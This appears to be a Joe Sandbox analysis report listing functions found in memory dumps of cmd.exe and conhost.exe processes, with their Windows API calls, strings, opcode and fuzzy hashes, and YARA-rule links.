Instruction ID: 639451675f17ef9a898197e79de5fe4cde151b56477422f921c6fb538183b03e
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 0091C4326206A8E5FF609FA5D458BAD37A0F364B88F446207EE4A5B689DB34C5F5C300

Function 0000022123C58090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000022123C580BC
GetCurrentThreadId.KERNEL32 ref: 0000022123C580CA
GetCurrentProcessId.KERNEL32 ref: 0000022123C580D6
QueryPerformanceCounter.KERNEL32 ref: 0000022123C580E6

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 927e848bc2e69cfe0935aa371a63653be77f14f065caf6524894913166f1f1e6
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 52112126714F14D9EB00CFA0E8587A933A4F769768F441E22EE6D867A4DF78D1B48740

Function 0000022123C527E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022123C528CC
StrCpyW.SHLWAPI ref: 0000022123C528E5

Part of subcall function 0000022123C53F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C5272F), ref: 0000022123C53FA0

Strings

\\.\pipe\, xrefs: 0000022123C528D7

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 4bb06d2f91ce54dc901096a0e1b3ce800e739fbe468f5c50ed116f406af258f8
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5B71C732210BA5E5E7359EA6A848BAA67D4F3A57C4F442217FD096BBCCDE34C5B1C700

Function 0000022123C227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022123C228CC
StrCpyW.SHLWAPI ref: 0000022123C228E5

Part of subcall function 0000022123C23F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C2272F), ref: 0000022123C23FA0

Strings

\\.\pipe\, xrefs: 0000022123C228D7

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 258ab457b5195b0d56d8fd83489e1899b2c2958bbbc4e7002b0b5c8a50843e8a
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: CC71D736220B65E1E7B4DFA69948BEA6794F364B84F452217FD0D4BB48DE34C6B1C700

Function 0000022123BF80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123BF80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022123BF8162

Strings

csm, xrefs: 0000022123BF8149

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: c3538f3615203a82c887c8fe0d8d169f59347d72aeb5410cc167669b8027a8b7
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B751AF32711A20EBDF64EF95E448F697391E364B88F255321FE4A8B788D77AD861C700

Function 0000022123BC80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022123BC80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022123BC8162

Strings

csm, xrefs: 0000022123BC8149

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 4458924c8ec1f0da70bcf61281723291d13e3bb950849371b980187eca93797a
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6651BF32711A20EEDF74EF95E44CF693391E364B88F154A21EE4A8B788DB78C861C700

Function 0000022123BF9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000022123BF9BA7

Strings

MOC, xrefs: 0000022123BF9B6F
RCC, xrefs: 0000022123BF9B77

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: f8b0efb1a2bb081becdeb174f500325796c88955bc3f4a1dd555a5d6c4ab67fc
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: CF61C232504BD4D2DB30AF55E444B9AB7A0F7A9B88F145315FF980BB95CB79C0A0CB00

Function 0000022123BC9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000022123BC9BA7

Strings

RCC, xrefs: 0000022123BC9B77
MOC, xrefs: 0000022123BC9B6F

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 37270aef225f7ba92962e91457dd021cef62df64733816f0495d7bf1f8b57065
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1F61C232504BC4D9EB30AF55E444B9AB7A0F7A9B88F044715FF981BB95CB78C0A0CB00

Function 0000022123C525DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022123C526C2
StrCpyW.SHLWAPI ref: 0000022123C526D9

Strings

\\.\pipe\, xrefs: 0000022123C526CD

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 5c376d35bbc68ea877755ba74bc9931794fe3b42fef3cfa41e167cbaf3944bb9
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 0D5106262147A8E1E624CEA5F45CBAA67A1F3B47C0F051227ED496BBCDDE35C4B1C740

Function 0000022123C225DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022123C226C2
StrCpyW.SHLWAPI ref: 0000022123C226D9

Strings

\\.\pipe\, xrefs: 0000022123C226CD

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 790ee70fc367c304df1276190cb9ebe91656f4e22da251b20a4d0bd8fc0ec299
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 84513C26218BA8E1E6A48EA9E45CBAA6760F3B4F40F051227ED4D4BB5DDA35C5B0C740

Function 0000022123C62660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000022123C62778
GetLastError.KERNEL32 ref: 0000022123C6279D

Strings

U, xrefs: 0000022123C62722

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: b925385357e6037b0b301eb57f746ae8fa0c59d49f197392b68a4625b644e259
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: DD412D72625A54D6D710CF65E408B99B7A0F398784F401222FE4D8B758DB38D4A1CB40

Function 0000022123C32660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000022123C32778
GetLastError.KERNEL32 ref: 0000022123C3279D

Strings

U, xrefs: 0000022123C32722

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 63d033d6e0a27e95c581628fad4c4eab81bd45c4f0f87a17bed408bc7cae38b6
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: E5410B72625794D6EB10CFA5E408B99B7B0F358784F405222FE4D8B758EB38C5A1C740

Function 0000022123C59178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000022123C591C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000022123C587F7), ref: 0000022123C59209

Strings

csm, xrefs: 0000022123C591F6

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 3fea4e51061c95c08e1ad11e21629e2917d3b3f52f60923e8bfc5f99f8269196
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 08115B32214B9492EB248B15F40864AB7E1F798B84F685221EF8D0BBA4DF3DC5A1CB00

Function 0000022123C29178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000022123C291C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000022123C287F7), ref: 0000022123C29209

Strings

csm, xrefs: 0000022123C291F6

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: aa5bfbff80aec522ba400115a2cb2349a74d7478659afd9a13be9c210e938443
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 3E115B32214B9492EB648B15F408649B7E1F798B84F585221EECD0BB64DF3DC5B1CB00

Function 0000022123C51D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C51D69
HeapAlloc.KERNEL32 ref: 0000022123C51D77
GetProcessHeap.KERNEL32 ref: 0000022123C51D9C
HeapFree.KERNEL32 ref: 0000022123C51DAA

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 2a196670cf31b06c99ee828d7a83fa157223dd105698c79baaecdf347339c1d1
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 9511E121601B98D5EE01CBA6A40C55973A0F7C8FC0F585225EF4E57364DF39D4A2C700

Function 0000022123C21D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C21D69
HeapAlloc.KERNEL32 ref: 0000022123C21D77
GetProcessHeap.KERNEL32 ref: 0000022123C21D9C
HeapFree.KERNEL32 ref: 0000022123C21DAA

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: fb47aec53ea757b7efc87c7fa91f3dfcaa956d26eeac13730b77036eac60bf6f
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: A611D625601F98D1EA15CFA6E40855977B0F7D8FC0F585226EE4E57724DF39D6A2C300

Function 0000022123C51264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C5126A
HeapAlloc.KERNEL32 ref: 0000022123C51279
GetProcessHeap.KERNEL32 ref: 0000022123C51293
HeapAlloc.KERNEL32 ref: 0000022123C512A4

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 216cfa3702de209d908f991dfa534a9d5f2861c106f9e31024633cb093c584c2
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: A4E03931602618EAE7148BA2D80878936E1EB98B05F549124CE090B350EF7E94E9AB40

Function 0000022123C21264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C2126A
HeapAlloc.KERNEL32 ref: 0000022123C21279
GetProcessHeap.KERNEL32 ref: 0000022123C21293
HeapAlloc.KERNEL32 ref: 0000022123C212A4

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 834e0ecae5f25fd690bbb72ec068ec5b19c38b435709a9f0bd38bca57035ff8e
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: F8E06D31601618EAE7148FA2D80C78936E1FB98F05F44D124CD090B350EF7E85F98740

Function 0000022123C51000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C51006
HeapAlloc.KERNEL32 ref: 0000022123C51015
GetProcessHeap.KERNEL32 ref: 0000022123C51028
HeapAlloc.KERNEL32 ref: 0000022123C51037

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 06b3879994855eb41b2211279e74e83476b3f556fb56989caf67414040a01dba
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: EBE0ED71611518EBE7189BA2D80869976A1FB98B15F549125CE090B310EE3994F9AA10

Function 0000022123C21000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C21006
HeapAlloc.KERNEL32 ref: 0000022123C21015
GetProcessHeap.KERNEL32 ref: 0000022123C21028
HeapAlloc.KERNEL32 ref: 0000022123C21037

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: e4c527ce9d1da941725debe6ccd72ff2bb48d6fbccbc7cef7b6fd0167d5fbaee
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 33E01271611618EBE7189FA2DC0879976E1FB9CF15F449125CD090B310EE7D85F9D710

Analysis Process: conhost.exePID: 7912, Parent PID: 7904COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1524
Total number of Limit Nodes:	10

Executed Functions

Function 0000013F08E61724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E6172F
HeapAlloc.KERNEL32 ref: 0000013F08E6173E

Part of subcall function 0000013F08E61264: GetProcessHeap.KERNEL32 ref: 0000013F08E6126A
Part of subcall function 0000013F08E61264: HeapAlloc.KERNEL32 ref: 0000013F08E61279
Part of subcall function 0000013F08E61264: GetProcessHeap.KERNEL32 ref: 0000013F08E61293
Part of subcall function 0000013F08E61264: HeapAlloc.KERNEL32 ref: 0000013F08E612A4

